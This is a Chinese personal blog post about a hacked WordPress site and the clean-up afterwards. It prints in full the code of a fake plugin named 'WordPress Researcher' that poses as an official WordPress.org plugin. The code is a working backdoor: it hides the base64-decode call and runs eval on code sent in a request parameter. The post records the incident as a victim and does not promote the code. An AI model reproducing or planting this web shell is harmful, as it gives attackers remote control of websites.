被黑了?

早上起来,帮嫦子发了篇文章。选择作者的时候,发现多了几个不知名(肯定不是我自己注册的、另外也关闭注册了的)的作者,吓了一跳。

检查了一遍,数据没丢失,那些管理员全部都是2010年3月19号注册的。检查插件,发现多了一个叫 WordPress Researcher 的东东(文件最后修改日期是20141113)。哎,杯具了。就这么个破站,有啥好搞的呢?

lots-of-admin


WordPress Researcher

那插件就一个文件,附上代码,不知道有啥用。

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
*/
function research_plugin()
{
if (isset($_REQUEST['X3PN']))
{
$myfunc = 'bas'.'e64_'.'dec'.'ode';
$myvar = $myfunc($_REQUEST['X3PN']);
eval($myvar);
}
return;
}

add_action('after_setup_theme', 'research_plugin');
?>

程序文件全部删掉了,导出了xml,数据库也不要了,重新安装导入了文章和评论内容,主题也重新检查了一遍,折腾大半天,终于又差不多回复原貌了。才发现,友链忘了备份了!又得手工整理一遍,累!

免责声明:本博客(https://cyhour.com/)仅为分享信息绝非推荐,网站不参与交易绝非中介,内容均仅代表个人观点绝非权威,所有信息仅供参考,读者请自行考虑后入手并自担风险!一分钱一分货仍是恒久不变之真理,未成年读者(包括生理和心理)请在监护人陪同下访问本站!
除非注明,沙唐桔文章均为原创,本文地址 https://cyhour.com/135/AMP 移动加速版本)转载时必须以链接形式注明原始出处。
Vultr 送$100,搬瓦工年付最低$49,优惠码 BWH3HYATVBJW,更多推荐VPS信息,或支持老杨
Views: 779

Comments:0

发表留言

Vultr 送$100,搬瓦工年付最低$49,优惠码 BWH3HYATVBJW,更多推荐VPS信息